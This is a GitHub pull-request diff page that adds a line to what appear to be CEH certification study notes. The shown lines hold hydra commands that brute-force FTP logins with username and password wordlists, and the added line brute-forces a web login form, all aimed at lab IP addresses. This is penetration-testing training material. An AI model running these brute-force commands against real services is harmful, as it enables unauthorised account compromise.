Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions Everything You Need.md
Original file line number Diff line number Diff line change
Expand Up @@ -45,6 +45,8 @@ Then go to Desktop and in Ceh tools folder you will find wordlists, here you wil
Now in terminal type- hydra -L /home/attacker/Desktop/CEH_TOOLS/Wordlists/Username.txt -P /home/attacker/Desktop/CEH_TOOLS/Wordlists/Password.txt ftp://10.10.10.10

hydra -l user -P passlist.txt ftp://10.10.10.10

hydra -l <username> -P <wordlist> 10.10.82.119 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
```
# Hacking Web Application
```
Expand Down